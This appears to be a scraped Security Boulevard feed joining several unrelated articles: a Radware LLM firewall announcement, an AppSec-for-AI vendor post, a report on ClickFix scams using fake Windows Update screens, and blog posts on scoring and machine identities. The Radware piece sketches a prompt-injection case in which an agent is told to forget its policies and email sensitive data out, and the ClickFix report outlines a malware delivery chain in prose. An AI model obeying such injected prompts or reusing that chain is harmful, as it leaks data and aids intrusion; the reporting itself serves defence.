srcset="https://securityboulevard.com/wp-content/uploads/2025/11/Screen-Shot-2025-11-24-at-12.29.55-PM-284x300.png 284w, https://securityboulevard.com/wp-content/uploads/2025/11/Screen-Shot-2025-11-24-at-12.29.55-PM-969x1024.png 969w, https://securityboulevard.com/wp-content/uploads/2025/11/Screen-Shot-2025-11-24-at-12.29.55-PM-768x812.png 768w, https://securityboulevard.com/wp-content/uploads/2025/11/Screen-Shot-2025-11-24-at-12.29.55-PM.png 1122w" sizes="(max-width: 391px) 100vw, 391px"></a></p><h3></h3><h3></h3><h3></h3><h3></h3><h3></h3><h3></h3><h3></h3><h3></h3><h3></h3><h3><strong>Key Insight #6: Never “Set-and-Forget” Scores</strong></h3><p>There is a false perception that scores don’t need much maintenance. However, changing economic conditions, business strategies, target markets and risk tolerances are among the drivers that cause current operational practices around a credit risk or fraud solution to lose effectiveness over time. In the case of fraud solutions, fraudsters change their tactics regularly to evade defenses. Practitioners should track and recalibrate their credit risk scores at least annually and fraud scores even more often.</p><h3><strong>Key Insight #7:  Be Wary of Marketing Hype  </strong></h3><p>Marketing hype or exaggeration is unfortunately common in our space. I see it every day and I urge risk managers to exercise caution, particularly when it involves buzzwords like Artificial Intelligence (AI) and Machine Learning (ML). Many providers pitching for business exaggerate the role of these in their solutions, leading to misunderstandings about the actual sophistication and effectiveness of the technology.</p><p>I advise asking critical questions to distinguish genuine AI solutions from inflated claims. At LexisNexis Risk Solutions we emphasize transparency. We only reference AI or ML in our offerings where these technologies are demonstrably in use. Don’t get caught out: choosing solutions that make overstated AI claims inevitably results in unnecessary operational and compliance burdens that will further negatively impact efficiency. In short, validate every marketing claim until you are satisfied it really does what it promises.</p><h3><strong>Conclusion</strong></h3><p>There are so many moving parts that make competitive testing a complicated balancing act. By following a structured approach and applying due diligence in all the right places, while avoiding the pitfalls of overstated promises, any business can discover the optimal mix of solutions to best serve their customers and business objectives. Above all, they can find the solutions provider that represents the perfect technical and cultural fit that will result in a long and productive partnership.</p><p> </p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2025/11/dont-use-a-ruler-to-measure-wind-speed-establishing-a-standard-for-competitive-solutions-testing/" data-a2a-title="Don’t Use a Ruler to Measure Wind Speed: Establishing a Standard for Competitive Solutions Testing"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fdont-use-a-ruler-to-measure-wind-speed-establishing-a-standard-for-competitive-solutions-testing%2F&amp;linkname=Don%E2%80%99t%20Use%20a%20Ruler%20to%20Measure%20Wind%20Speed%3A%20Establishing%20a%20Standard%20for%20Competitive%20Solutions%20Testing" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fdont-use-a-ruler-to-measure-wind-speed-establishing-a-standard-for-competitive-solutions-testing%2F&amp;linkname=Don%E2%80%99t%20Use%20a%20Ruler%20to%20Measure%20Wind%20Speed%3A%20Establishing%20a%20Standard%20for%20Competitive%20Solutions%20Testing" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fdont-use-a-ruler-to-measure-wind-speed-establishing-a-standard-for-competitive-solutions-testing%2F&amp;linkname=Don%E2%80%99t%20Use%20a%20Ruler%20to%20Measure%20Wind%20Speed%3A%20Establishing%20a%20Standard%20for%20Competitive%20Solutions%20Testing" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fdont-use-a-ruler-to-measure-wind-speed-establishing-a-standard-for-competitive-solutions-testing%2F&amp;linkname=Don%E2%80%99t%20Use%20a%20Ruler%20to%20Measure%20Wind%20Speed%3A%20Establishing%20a%20Standard%20for%20Competitive%20Solutions%20Testing" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fdont-use-a-ruler-to-measure-wind-speed-establishing-a-standard-for-competitive-solutions-testing%2F&amp;linkname=Don%E2%80%99t%20Use%20a%20Ruler%20to%20Measure%20Wind%20Speed%3A%20Establishing%20a%20Standard%20for%20Competitive%20Solutions%20Testing" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<p>Radware has developed a firewall for large language models (LLMs) that ensures governance and security policies are enforced in real time.</p><p>Provided as an add-on to the company’s Cloud Application Protection Services, <a href="https://www.radware.com/newsevents/pressreleases/2025/radware-protects-generative-ai-use-with-new-llm-firewall/">Radware LLM Firewall</a> addresses the top 10 risks and mitigations for LLMs and generative artificial intelligence (AI) applications defined by the <a href="https://owasp.org/www-project-top-10-for-large-language-model-applications/">OWASP GenAI Security Project</a>.</p><p>At the core of that capability is an AI model that Radware created to determine if a prompt being shared with an LLM is malicious or if personally identifiable information is being exfiltrated.</p><p>Dror Zelber, vice president of product management for Radware, said LLM Firewall is the latest in a series of AI-based offerings that Radware is developing to secure next-generation applications, including AI agents. In effect, Radware is investing in AI to secure AI, he added.</p><p><a href="https://securityboulevard.com/wp-content/uploads/2025/11/Radware-LLM-Firewall.png"><img fetchpriority="high" decoding="async" class="alignnone wp-image-2077249" src="https://securityboulevard.com/wp-content/uploads/2025/11/Radware-LLM-Firewall-300x122.png" alt="" width="568" height="231" srcset="https://securityboulevard.com/wp-content/uploads/2025/11/Radware-LLM-Firewall-300x122.png 300w, https://securityboulevard.com/wp-content/uploads/2025/11/Radware-LLM-Firewall.png 662w" sizes="(max-width: 568px) 100vw, 568px"></a></p><p>That effort will prove crucial because attacks on AI applications and agents are going to be extremely challenging to predict so there will be a need for a complete stack of security software designed specifically to secure them, noted Zelber. The only thing that remains to be determined now is when a tipping point that forces organizations to reckon with AI security is going to arrive, he said.</p><p>There is already no shortage of cybersecurity tools and platforms for securing AI applications and agents, many of which are already being attacked by malicious actors attracted to anything that organizations clearly spent a significant amount of time and effort to build and deploy. The issue is that in the rush to deploy these applications many organizations have, once again, overlooked the cybersecurity risks attached to an emerging technology. Radware is now working toward lowering the bar to the point where it becomes significantly easier to secure AI applications, said Zelber.</p><p>Unfortunately, not enough organizations fully appreciate how malicious a prompt can be. For example, a prompt might direct an AI agent to first forget everything it knows about existing governance and security policies before directing it to email sensitive data to an external address. More troubling still, cybercriminals will target autonomous AI agents that will enable them to commandeer entire workflows and business processes.</p><p>In the short term there will, inevitably, be some major cybersecurity incidents involving AI applications and agents. A recent Futurum Group <a href="https://futurumgroup.com/press-release/futurum-research-ai-security-skills-gap-persists/">survey</a> found only 26% of organizations have implemented dedicated AI/machine learning security controls and processes to evaluate and monitor vulnerabilities involving AI. The number of organizations that are putting those controls in place continues to steadily increase, so hopefully, the damage from any breach will be limited as more of them understand the risk.</p><p>In the meantime, there is not going to be any putting the AI genie back in the proverbial bottle, so it will be up to cybersecurity teams to put the guardrails in place that are already much needed. The challenge, as always, will be explaining to end users why those guardrails are being put in place as much for their own good as the organization.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2025/11/radware-adds-firewall-for-llms-to-security-portfolio/" data-a2a-title="Radware Adds Firewall for LLMs to Security Portfolio"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fradware-adds-firewall-for-llms-to-security-portfolio%2F&amp;linkname=Radware%20Adds%20Firewall%20for%20LLMs%20to%20Security%20Portfolio" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fradware-adds-firewall-for-llms-to-security-portfolio%2F&amp;linkname=Radware%20Adds%20Firewall%20for%20LLMs%20to%20Security%20Portfolio" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fradware-adds-firewall-for-llms-to-security-portfolio%2F&amp;linkname=Radware%20Adds%20Firewall%20for%20LLMs%20to%20Security%20Portfolio" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fradware-adds-firewall-for-llms-to-security-portfolio%2F&amp;linkname=Radware%20Adds%20Firewall%20for%20LLMs%20to%20Security%20Portfolio" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fradware-adds-firewall-for-llms-to-security-portfolio%2F&amp;linkname=Radware%20Adds%20Firewall%20for%20LLMs%20to%20Security%20Portfolio" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<p><i>Get details on 4 new AppSec requirements in the AI-led software development era.</i></p><p>We all know AI is transforming software development, and software security. But in the midst of all the hype, fear, and information overload, what are the top 4 AppSec steps you should focus on today?</p><p>Our experts recommend the following:</p><p> </p><h2><span style="font-weight: normal;">AI discovery</span><span> </span><span></span></h2><p>AI visibility is now a key part of AppSec. The ability to identify AI-generated code, and where and how AI is in use in your software development environment has become critical.</p><p>You want to both discover AI in your environment, and create governance around how it’s used.</p><p>What exactly do you need to discover? Ultimately, all AI elements in your development environment – every model your developers are creating, every MCP they are using, and other components like AI services.</p><p>In addition, what AI-generating tools are in use? Cursor? Copilot? You’ll need to apply governance around these tools as well.</p><p> </p><p><img fetchpriority="high" decoding="async" src="https://www.legitsecurity.com/hs-fs/hubfs/VibeGuard%20Control%20Center.png?width=2880&amp;height=3762&amp;name=VibeGuard%20Control%20Center.png" width="2880" height="3762" alt="VibeGuard Control Center" style="height: auto; max-width: 100%; width: 2880px;"></p><p> </p><h2><span><span>AI-specific security testing </span></span></h2><p>AI-specific security testing has become vital as well. AI brings in some novel vulnerabilities and weaknesses that traditional scanners can’t find, such as training model poisoning, excessive agency, or others detailed in <a href="https://genai.owasp.org/llm-top-10/">OWASP’s LLM &amp; Gen AI Top 10</a>.</p><p>You also now need the ability to identify low-reputation or malicious AI models in use.</p><p> </p><h2><span><span>Threat modeling </span></span></h2><p>As the risk to the organization is changing, so too must threat models. If your app now exposes AI interfaces, is running an agent, or gets input from users and uses the model to process it, you’ve got new risks.</p><p>Legit’s <a href="https://www.legitsecurity.com/advanced-code-change-management-in-software-development-for-safe-releases">Advanced Code Change Management</a> plays a role here. It can detect when a team is introducing a new AI component to their app, then alert the right people to threat model the app before it’s too late. You don’t want to discover a chatbot without the proper guardrails after it’s been deployed for months.</p><h2><span>Awareness of toxic combinations </span></h2><p>The use of AI in code development itself is not necessarily a risk. But when its use is combined with another risk, like lack of static analysis or branch protection, the risk level rises.</p><p>For instance, research for our <a href="https://info.legitsecurity.com/state-of-application-risk?_gl=1*8aljkj*_gcl_au*NDE2NzczNTM0LjE3NTkxNTExNzg.*_ga*MTY0Mzc4MzAzOC4xNzM1NTcwNTk1*_ga_5FM5NFNQMW*czE3NjM3NTYxMTYkbzEwOTUkZzEkdDE3NjM3NTYxNDMkajMzJGwwJGgxMTQwMDMyMTI3">2025 State of Application Risk report</a> revealed that, on average, 17% of repos per organization have developers using GenAI tools PLUS lack of branch protection or code review. </p><p> </p><p><img decoding="async" src="https://www.legitsecurity.com/hs-fs/hubfs/toxic-combo-branch.png?width=7013&amp;height=6784&amp;name=toxic-combo-branch.png" width="7013" height="6784" alt="toxic-combo-branch" style="height: auto; max-width: 100%; width: 7013px;"></p><p> </p><p>These “toxic combinations” require both discovering which development pipelines are using GenAI to create code, and then ensuring those pipelines have all the appropriate security measures and guardrails in place.</p><h2 style="font-weight: normal;">Learn more</h2><p>Get more details on <a href="https://info.legitsecurity.com/appsec-in-the-age-of-ai-report?_gl=1*115r0sb*_gcl_au*NDE2NzczNTM0LjE3NTkxNTExNzg.*_ga*MTY0Mzc4MzAzOC4xNzM1NTcwNTk1*_ga_5FM5NFNQMW*czE3NjM3NTYxMTYkbzEwOTUkZzEkdDE3NjM3NTYxODQkajU5JGwwJGgxMTQwMDMyMTI3">AppSec in the Age of AI</a> in our new whitepaper.</p><p> </p><p><img loading="lazy" decoding="async" src="https://track.hubspot.com/__ptq.gif?a=20956152&amp;k=14&amp;r=https%3A%2F%2Fwww.legitsecurity.com%2Fblog%2F4-new-appsec-requirements-in-the-age-of-ai&amp;bu=https%253A%252F%252Fwww.legitsecurity.com%252Fblog&amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "></p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2025/11/4-new-appsec-requirements-in-the-age-of-ai/" data-a2a-title="4 New AppSec Requirements in the Age of AI"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2F4-new-appsec-requirements-in-the-age-of-ai%2F&amp;linkname=4%20New%20AppSec%20Requirements%20in%20the%20Age%20of%20AI" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2F4-new-appsec-requirements-in-the-age-of-ai%2F&amp;linkname=4%20New%20AppSec%20Requirements%20in%20the%20Age%20of%20AI" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2F4-new-appsec-requirements-in-the-age-of-ai%2F&amp;linkname=4%20New%20AppSec%20Requirements%20in%20the%20Age%20of%20AI" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2F4-new-appsec-requirements-in-the-age-of-ai%2F&amp;linkname=4%20New%20AppSec%20Requirements%20in%20the%20Age%20of%20AI" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2F4-new-appsec-requirements-in-the-age-of-ai%2F&amp;linkname=4%20New%20AppSec%20Requirements%20in%20the%20Age%20of%20AI" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.legitsecurity.com/blog">Legit Security Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Suzanne Ciccone">Suzanne Ciccone</a>. Read the original post at: <a href="https://www.legitsecurity.com/blog/4-new-appsec-requirements-in-the-age-of-ai">https://www.legitsecurity.com/blog/4-new-appsec-requirements-in-the-age-of-ai</a> </p>

Power seller Rick Probstein returned his trading card and memorabilia consignment business to eBay Monday following the indefinite shutdown of snype, a competing marketplace he tried to launch three … [+1217 chars]

Protecting your family is everyone's top priority, and the digital world makes this so much more complicated - but the best identity threat protection services can help with that, at least one aspect… [+1011 chars]

THIS CONTENT IS RESERVED FOR SUBSCRIBERS ONLY Subscribe now to read the latest news in your city and across Canada. <ul><li>Exclusive articles from Barbara Shecter, Joe O'Connor, Gabriel Friedman, … [+7053 chars]

If you're traveling abroad this holiday season, prepare for a new, unnerving hurdle at the border: having your phone searched. US border agents are seriously stepping up their device searches, even f… [+5394 chars]

A cluster of tents had sprung up on the University of Houstons central lawn. Draped in keffiyehs and surrounded by a barricade of plywood pallets, students stood on a blue tarp spread over the grass.… [+12689 chars]

Many years ago, when I was but an infant, the first computers were connected on the ARPANET - the seminal computer network that would eventually evolve to become the Internet. Computers at the tim… [+9354 chars]

<p>Threat actors are using a twist on the ClickFix attack model, in this case hiding the malicious code they want victims to download in a convincing – but fake – Windows Update screen, complete with white lettering against a bright blue background.</p><p>“This newer variant mimics the blue Windows Update splash page in full-screen, displaying realistic ‘Working on updates’ animations that eventually conclude by prompting the user to follow the standard ClickFix pattern: Open the Run prompt (Win+R), then paste and run the malicious command,” Huntress security researchers Ben Folland and Anna Pham <a href="https://www.huntress.com/blog/clickfix-malware-buried-in-images" target="_blank" rel="noopener">wrote in a report</a> this week.</p><p>Doing so kicks off a series of steps that eventually lead to installing the LummaC2 and Rhadamanthys info-stealing malware.</p><p>A ClickFix is a relatively new but increasingly popular social engineering scam in which victims are duped into manually executing malicious commands on their systems, leading to malware, including ransomware, being deployed and allowing the bad actors to bypass protections.</p><p>Security researchers with Microsoft in August wrote about the <a href="https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/#:~:text=protection%20and%20detection-,The%20ClickFix%20attack%20chain,conventional%20and%20automated%20security%20solutions." target="_blank" rel="noopener">growing use of ClickFix scams</a> by cybercriminals, noting that there are “campaigns targeting thousands of enterprise and end-user devices globally every day. Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware.”</p><h3>Rapid Rise in ClickFix Campaigns</h3><p>In June, cybersecurity company ESET noted in a <a href="https://www.welivesecurity.com/en/eset-research/eset-threat-report-h1-2025/" target="_blank" rel="noopener">report</a> about the threat landscape in the first half of the year that “one of the most striking developments this period was the emergence of ClickFix, a new, deceptive attack vector that skyrocketed by over 500% compared to [the second half of] 2024 in ESET telemetry.  This makes it one of the most rapidly rising threats, accounting for nearly 8% of all blocked attacks in H1 2025, and is now the second most common attack vector after phishing.”</p><p>“The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors,” Jiří Kropáč, director of ESET’s Threat Prevention Labs, <a href="https://www.eset.com/us/about/newsroom/research/eset-threat-report-clickfix-fake-error-surges-spreads-ransomware-and-other-malware/?srsltid=AfmBOorwGQCjg70fwuiGi-oa6j4AnocU5FNRM7HJAhGLqx9xhxN6WV4i&amp;srsltid=AfmBOopk6qMXd6IlPQlFpcE3ZbZCaTsDB-defMbO2TOMK24TkO0XGLnb" target="_blank" rel="noopener">said in a statement</a>.</p><h3>Dropping LummaC2, Rhadamanthys Infostealers</h3><p>In the campaign tracked by Huntress, two ClickFix lures that used a steganographic loader to deliver info-stealing malware, LummaC2 and Rhadamanthys. With steganographic ClickFix scams, the malicious software is hidden within the pixel data of image files, with the goal again being to trick the user into running the malicious commands.</p><p>One variant used a human verification page as the lure, the researchers wrote. The other variant featured the Windows Update page.</p><h3>Looks Like the Real Thing</h3><p>They wrote that since the beginning of October, they’ve been tracking several ClickFix clusters using the Windows Update ploy, aimed at convincing them a Windows update cycle has started. The message fills up the entire screen and displays what Folland and Pham said is a “genuine-looking Windows Update screen.”</p><p>It’s complete with instructions not to turn off the computer while the updates are working and showing the user the progress of the updates.</p><p>“At the end of the ‘update,’ users are encouraged to follow the regular Win+R &amp; Ctrl+V pattern to paste a malicious command,” they wrote, adding that the execution chain is the same as one used with the human verification variant.</p><p>“This starts with an mshta.exe command that contains a URL where the 2nd octet is always hex-encoded,” the researchers wrote. “This leads to the execution of PowerShell, which dynamically decrypts and loads a reflective .NET assembly that, in turn, loads another .NET assembly used for process injection. The shellcode injected into the target process is extracted using steganography.”</p><h3>Finding the Payloads</h3><p>The infostealer malware is taken from the image and put into a Donut coding tool that enables in-memory execution of VBScript, JScript, EXE, DLL files, and .NET assemblies. Using a donut-decryptor tool, the researchers were able to see that the malicious payload was the LummaC2 and Rhadamanthys infostealers.</p><p>Earlier this month, law enforcement agencies in Europe took down the infrastructure used by threat actors to deploy a number of malware families, including Rhadamanthys, as part of the ongoing international Operation Endgame. Folland and Pham noted that their research was done before and after the law enforcement action and that Rhadamanthys is no longer being delivered in the fake Windows Update campaign.</p><p>“Ultimately, while the use of steganography helps these payloads evade signature-based detection and complicates analysis, the attacks rely on a simple delivery mechanism: the victim manually opening the Windows Run box to paste a malicious command,” they wrote.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2025/11/attackers-are-using-fake-windows-updates-in-clickfix-scams/" data-a2a-title="Attackers are Using Fake Windows Updates in ClickFix Scams"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fattackers-are-using-fake-windows-updates-in-clickfix-scams%2F&amp;linkname=Attackers%20are%20Using%20Fake%20Windows%20Updates%20in%20ClickFix%20Scams" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fattackers-are-using-fake-windows-updates-in-clickfix-scams%2F&amp;linkname=Attackers%20are%20Using%20Fake%20Windows%20Updates%20in%20ClickFix%20Scams" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fattackers-are-using-fake-windows-updates-in-clickfix-scams%2F&amp;linkname=Attackers%20are%20Using%20Fake%20Windows%20Updates%20in%20ClickFix%20Scams" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fattackers-are-using-fake-windows-updates-in-clickfix-scams%2F&amp;linkname=Attackers%20are%20Using%20Fake%20Windows%20Updates%20in%20ClickFix%20Scams" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fattackers-are-using-fake-windows-updates-in-clickfix-scams%2F&amp;linkname=Attackers%20are%20Using%20Fake%20Windows%20Updates%20in%20ClickFix%20Scams" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<h2>How Does Non-Human Identity Management Shape Today’s Cybersecurity Landscape?</h2><p>Imagine where machines seamlessly interact with each other in a secure yet complex web of communication. How do we ensure the security of such vast and intricate structures? The answer lies in the effective management of Non-Human Identities (NHIs), which are fundamentally machine identities within cybersecurity. By controlling NHIs and their secrets, organizations can fortify their cybersecurity posture significantly.</p><h3>Why Are Non-Human Identities Critical in Cybersecurity?</h3><p>The rise of cloud computing and digital transformation has propelled NHIs to the forefront of cybersecurity challenges. NHIs play the role of machine identities that determine access and permissions across systems. These identities consist of encrypted passwords, tokens, or keys (the “secret”) that provide unique identifiers akin to a passport. The access and permissions (much like a visa) granted to these secrets by destination servers seal the deal.</p><p>The primary mission of NHI management is to effectively secure these machine identities and their secrets, ensuring that access credentials are not compromised. By monitoring and analyzing the behavior of these NHIs, it becomes possible to detect and mitigate potential threats efficiently. This methodology is crucial across industries like financial services, healthcare, travel, DevOps, and security operations centers (SOC), especially for organizations leveraging cloud environments.</p><h3>The Lifecycle of NHI Management</h3><p>The lifecycle of managing non-human identities covers multiple phases:</p><ul> <li><strong>Discovery and Classification:</strong> The first step involves identifying all NHIs within your organization and classifying them based on their roles and privileges.</li> <li><strong>Threat Detection:</strong> Continuous monitoring helps in identifying unusual patterns which might indicate potential security threats.</li> <li><strong>Remediation:</strong> Once threats are detected, immediate action is necessary to neutralize them and implement measures to prevent future occurrences.</li> </ul><p>NHI management platforms provide an advantage by offering insights into ownership, permissions, usage patterns, and vulnerabilities, allowing for context-aware security. This holistic approach surpasses traditional point solutions that offer limited protection, such as secret scanners.</p><h3>Benefits of Effective NHI Management</h3><p>The management of NHIs is not merely a technological advance; it represents a shift towards smarter cybersecurity practices. The benefits of effective non-human identity management are far-reaching:</p><ul> <li><strong>Reduced Risk:</strong> By identifying and mitigating security risks proactively, organizations can significantly reduce the likelihood of data breaches and leaks.</li> <li><strong>Improved Compliance:</strong> NHI management aids in meeting regulatory requirements with enhanced policy enforcement and audit trails.</li> <li><strong>Increased Efficiency:</strong> Automating NHIs and secrets management frees security teams to focus on strategic initiatives.</li> <li><strong>Enhanced Visibility and Control:</strong> Centralized views of access management improve governance and oversight over non-human identities.</li> <li><strong>Cost Savings:</strong> By automating secrets rotation and NHIs decommissioning, organizations can reduce operational costs significantly.</li> </ul><h3>Bridging the Gap Between Security and Development</h3><p>One of the prevalent challenges in organizations today is the disconnect between security and R&amp;D teams. This gap can create vulnerabilities and inefficiencies. Effective NHI management provides the tools and frameworks necessary to bridge this gap, creating secure cloud environments conducive to innovation and development.</p><p>The essential role of NHI management cannot be understated, especially given the collaborative nature of modern development environments where DevOps practices are integral. It is vital to manage NHIs to maintain security without stifling the agility and speed that R&amp;D teams require.</p><h3>What’s on the Horizon for NHI Management?</h3><p>The future of NHI management is poised for substantial advancements, driven by the evolving demands of cloud-based infrastructures. Current trends indicate a shift towards:</p><ul> <li><strong>Machine Learning Integration:</strong> Leveraging AI and machine learning for predictive threat detection and automated responses.</li> <li><strong>Zero Trust Architectures:</strong> Adopting zero-trust principles where no machine or identity is inherently trusted.</li> <li><strong>Decentralized Identity Management:</strong> Exploring decentralized approaches to improve privacy and control over machine identities.</li> </ul><p>Additionally, the significance of NHIs in modern cybersecurity can be seen in specialized content available at <a href="https://entro.security/blog/iam-and-ilm-lifecycle-stages/">IAM and ILM Lifecycle Stages</a>, which discusses the key phases of identity management and their critical importance.</p><p>Where organizations continue to embrace digital transformation, the role of NHIs will grow in significance, shaping the future of cybersecurity strategies across industries. By understanding and implementing robust NHI management methodologies, leaders can position their organizations to thrive securely.</p><p>Whether it’s the integration of AI or the development of zero-trust frameworks, the continuous evolution of NHI management is both exciting and necessary to meet the security demands of tomorrow. More insights on this thrilling journey can be found in discussions around <a href="https://entro.security/blog/nhi-threats-mitigation-part-3/">NHI Threats Mitigation</a>, helping organizations stay one step ahead of potential threats.</p><p>Stay informed and adapted to the cutting-edge advancements in this domain, and capitalize on the benefits of protecting your non-human identities effectively.</p><h3>Addressing Challenges in NHI Management</h3><p>How can organizations ensure efficient and comprehensive management of NHIs, given the complexity of digital environments today? While automation and smart analytics significantly contribute to security solutions, they also introduce new challenges. With machine-generated data continues to proliferate, managing NHIs becomes akin to solving a complex puzzle.</p><p>The challenges stem not only from the volume of machine identities but also from their diversity. With countless devices and systems interconnected, each comes with its own configurations, permissions, and potential vulnerabilities. These variables make it critical for organizations to have a vigilant and adaptive approach to NHI management.</p><p><strong>Complexity in Scale</strong>: Where the scale of NHIs increases, so does the complexity of managing them efficiently. Organizations need to handle numerous machine identities, each with unique access rights and credentials. A single lapse in managing these identities can expose the entire system to potential threats.</p><p><strong>Integration with Legacy Systems</strong>: Many companies still operate with legacy systems that weren’t designed to accommodate modern cybersecurity practices. Integrating new NHI management strategies with these systems without disrupting operations forms another layer of complexity.</p><p><strong>Dynamic Environments</strong>: Cloud environments are dynamic, with resources being spun up or down based on current demands. Keeping track of NHIs in such fluid environments can be challenging for traditional security measures.</p><h3>The Importance of Collaborative Approaches</h3><p>Given these challenges, how can organizations shift their approach to NHI management? A collaborative approach is essential, where security teams work closely with development teams to ensure robust protection without hampering productivity.</p><p>Such collaboration implies sharing insights and strategies, utilizing cross-functional tools, and establishing a unified framework for managing NHIs. This not only strengthens security protocols but also fosters an organizational culture that values and prioritizes cybersecurity. Engaging with this proactive mindset can effectively bridge the gap between different teams and enhance overall organizational security. For a detailed exploration of this collaboration, the article <a href="https://entro.security/blog/iast-vs-rasp-and-their-blindspots-in-non-human-identity-management/">IAST vs. RASP and Their Blindspots in Non-Human Identity Management</a> provides a comprehensive analysis.</p><h3>Data-Driven Insights for Better NHI Strategies</h3><p>What role does data play in shaping effective NHI management strategies? Leveraging data-driven insights is paramount in developing robust cybersecurity frameworks. Data provides the context needed for examining and refining NHI practices:</p><ul> <li><strong>Anomaly Detection:</strong> By analyzing patterns and deviations from expected behaviors, data can help identify potential threats at their nascent stages, enabling quicker interventions.</li> <li><strong>Resource Allocation:</strong> Data helps in understanding usage trends, guiding organizations in optimizing resources allocated to NHI management for more efficient operations.</li> <li><strong>Compliance Analysis:</strong> With stringent regulations across industries, data insights assist organizations in ensuring compliance and preparing for audits through enhanced traceability and policy enforcement.</li> </ul><h3>Emerging Trends and Technologies in NHI Management</h3><p>How are advancements in technology shaping the future of NHI management? With technology evolves, it paves the way for innovative solutions that can streamline and secure NHI management processes further:</p><p><strong>AI and Machine Learning</strong>: The integration of AI-powered solutions for predictive threat 